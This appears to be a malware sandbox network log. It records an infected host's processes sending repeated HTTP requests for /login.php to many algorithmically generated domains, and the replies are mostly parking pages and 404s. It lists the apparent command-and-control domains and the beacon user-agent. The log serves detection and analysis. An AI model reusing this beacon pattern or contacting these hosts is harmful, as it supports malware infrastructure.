                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: ww16.vofycot.com
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Cookie: __tad=1731344868.1504633
Nov 11, 2024 18:08:10.636183977 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            date: Mon, 11 Nov 2024 17:08:10 GMT
                                                                                                                                                                                                            content-type: text/html; charset=UTF-8
                                                                                                                                                                                                            transfer-encoding: chunked
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                            cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                            pragma: no-cache
                                                                                                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_hNTn59GcRcmQBg/l9tawJx40dBXMve8vZ945/4/gF+3ErtUMvsR1Rx8reolQ2BmjNVkbBxEfg9ba+2E2Y6I68Q==
                                                                                                                                                                                                            last-modified: Mon, 11 Nov 2024 17:08:10 GMT
                                                                                                                                                                                                            x-cache-miss-from: parking-7596689c44-4sqbl
                                                                                                                                                                                                            server: Parking/1.0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.9 | 62212 | 72.52.179.174 | 80 | 7444 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:08:11.341985941 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gatyhub.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.9 | 62213 | 72.52.179.174 | 80 | 7444 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:08:11.839596033 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gatyhub.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.9 | 62366 | 178.162.203.211 | 80 | 4628 | C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:08:17.600913048 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gatyfus.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.9 | 62370 | 199.191.50.83 | 80 | 6964 | C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:08:18.252578020 CET | 279 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: galyqaz.com
Cookie: vsid=910vr4788904590031611
Nov 11, 2024 18:08:20.358485937 CET | 1236 | IN | HTTP/1.1 200 OK
Date: Mon, 11 Nov 2024 17:08:18 GMT
Server: Apache
Referrer-Policy: no-referrer-when-downgrade
Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                                                                                                            X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_NHOnw0G73BscnvIcyf8HaXYxUwB52N5y4R2rV77ldfg6F/P3HTMIgnr4aIPWR/fyPGslgb3huQzNdSH/7sK+hw==
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.9 | 62592 | 199.59.243.227 | 80 | 2936 | C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:08:21.744554996 CET | 305 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: vojyqem.com
Cookie: parking_session=a5a88ea0-36a7-4e4e-8f60-5d1139b1df65
Nov 11, 2024 18:08:22.156033039 CET | 1236 | IN | HTTP/1.1 200 OK
date: Mon, 11 Nov 2024 17:08:21 GMT
content-type: text/html; charset=utf-8
content-length: 1094
x-request-id: 541c896b-249d-4ef8-959e-64ae357caaa8
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==
                                                                                                                                                                                                            set-cookie: parking_session=a5a88ea0-36a7-4e4e-8f60-5d1139b1df65; expires=Mon, 11 Nov 2024 17:23:22 GMT


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.9 | 62593 | 44.221.84.105 | 80 | 2936 | C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe

Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:08:21.752516031 CET | 352 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qetyfuv.com
Cookie: snkz=66.23.206.109; btst=1885748a88d570f6bc1d4997b747b719|66.23.206.109|1731344858|1731344858|0|1|0
Nov 11, 2024 18:08:22.212192059 CET | 335 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Nov 2024 17:08:22 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=1885748a88d570f6bc1d4997b747b719|66.23.206.109|1731344902|1731344858|22|2|0; path=/; domain=.qetyfuv.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.2.9 | 62603 | 199.191.50.83 | 80 | 1812 | C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe

Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:08:25.152899981 CET | 279 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: galyqaz.com
Cookie: vsid=910vr4788904590031611
Nov 11, 2024 18:08:27.791850090 CET | 1236 | IN | HTTP/1.1 200 OK
Date: Mon, 11 Nov 2024 17:08:25 GMT
Server: Apache
Referrer-Policy: no-referrer-when-downgrade
Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_NHOnw0G73BscnvIcyf8HaXYxUwB52N5y4R2rV77ldfg6F/P3HTMIgnr4aIPWR/fyPGslgb3huQzNdSH/7sK+hw==
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.2.9 | 62605 | 3.94.10.34 | 80 | 1812 | C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe

Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:08:25.179245949 CET | 352 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lymyxid.com
Cookie: snkz=66.23.206.109; btst=efdffc983bdd66cc7891294af6cfad3b|66.23.206.109|1731344858|1731344858|0|1|0
Nov 11, 2024 18:08:25.605165958 CET | 335 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Nov 2024 17:08:25 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=efdffc983bdd66cc7891294af6cfad3b|66.23.206.109|1731344905|1731344858|23|2|0; path=/; domain=.lymyxid.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.2.9 | 62608 | 44.221.84.105 | 80 | 1812 | C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe

Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:08:25.184389114 CET | 352 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qetyfuv.com
Cookie: snkz=66.23.206.109; btst=1885748a88d570f6bc1d4997b747b719|66.23.206.109|1731344858|1731344858|0|1|0
Nov 11, 2024 18:08:25.608155966 CET | 335 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Nov 2024 17:08:25 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=1885748a88d570f6bc1d4997b747b719|66.23.206.109|1731344905|1731344858|23|2|0; path=/; domain=.qetyfuv.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.2.9 | 62604 | 188.114.96.3 | 80 | 1812 | C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe

Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:08:25.275260925 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qegyhig.com
Nov 11, 2024 18:08:25.868352890 CET | 974 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 11 Nov 2024 17:08:25 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Location: https://qegyhig.com/login.php
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iN56%2F2EOCHGI23m8cTq3VzSuE8RMzBbQagbD5JJkJjWlhDBctm%2Flvc09DX1lE%2Fiq7YHKRfSBXNfjfxjnmeiCFpa72xbo74%2FgI3PEdFy%2FcwLmUvri6mfeXHDqHL6%2F0Q%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e0fe25bbd9e1784-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1118&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=243&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                            Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
53 | 192.168.2.9 | 62607 | 23.253.46.64 | 80 | 1812 | C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:08:25.275335073 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gahyqah.com
Nov 11, 2024 18:08:25.633725882 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Server: Microsoft-IIS/7.5
                                                                                                                                                                                                            X-Powered-By: ASP.NET
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:20 GMT
                                                                                                                                                                                                            Content-Length: 1245
                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
Nov 11, 2024 18:08:25.633759975 CET | 169 | IN
                                                                                                                                                                                                            Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
54 | 192.168.2.9 | 62606 | 75.2.71.199 | 80 | 1812 | C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:08:25.275480032 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: puzylyp.com
Nov 11, 2024 18:08:25.606368065 CET | 166 | IN | HTTP/1.1 308 Permanent Redirect
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Location: https://puzylyp.com/login.php
                                                                                                                                                                                                            Server: Caddy
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:25 GMT
                                                                                                                                                                                                            Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
55 | 192.168.2.9 | 62609 | 154.212.231.82 | 80 | 1812 | C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:08:25.354177952 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gadyniw.com
Nov 11, 2024 18:08:26.239357948 CET | 696 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:26 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 548
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 11, 2024 18:08:30.640160084 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gadyniw.com
Nov 11, 2024 18:08:30.991812944 CET | 696 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:30 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 548
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
56 | 192.168.2.9 | 62610 | 208.100.26.245 | 80 | 1812 | C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:08:25.389173031 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lyvyxor.com
Nov 11, 2024 18:08:25.837728024 CET | 744 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:25 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 580
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 11, 2024 18:08:30.640512943 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lyvyxor.com
Nov 11, 2024 18:08:30.744774103 CET | 744 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:30 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 580
                                                                                                                                                                                                            Connection: keep-alive
Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
57 | 192.168.2.9 | 62611 | 199.59.243.227 | 80 | 1812 | C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:08:25.401827097 CET | 305 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: vojyqem.com
Cookie: parking_session=a5a88ea0-36a7-4e4e-8f60-5d1139b1df65
Nov 11, 2024 18:08:25.828382015 CET | 1236 | IN | HTTP/1.1 200 OK
date: Mon, 11 Nov 2024 17:08:25 GMT
content-type: text/html; charset=utf-8
content-length: 1094
x-request-id: 0ceb1ece-1079-48fc-a3c5-5e5212a4886c
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==
set-cookie: parking_session=a5a88ea0-36a7-4e4e-8f60-5d1139b1df65; expires=Mon, 11 Nov 2024 17:23:25 GMT
Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect
Nov 11, 2024 18:08:25.828485012 CET | 520 | IN | Data Raw: 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65
Data Ascii: " href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTVhODhlYTAtMzZhNy00ZTRlLThmNjAtNWQxMTM5YjFkZjY1IiwicGFnZV90aW1lIjoxNzMxMzQ0OTA1LCJwYWdlX3VybCI6Imh0dHA6L


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
58 | 192.168.2.9 | 62612 | 178.162.203.211 | 80 | 1812 | C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:08:25.402143002 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gatyfus.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
59 | 192.168.2.9 | 62613 | 18.208.156.248 | 80 | 1812 | C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:08:25.504271030 CET | 352 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: vonypom.com
Cookie: snkz=66.23.206.109; btst=d26b1bc4b9544e9356db55f438dfb4a0|66.23.206.109|1731344858|1731344858|0|1|0
Nov 11, 2024 18:08:25.926847935 CET | 335 | IN | HTTP/1.1 200 OK
Server: nginx
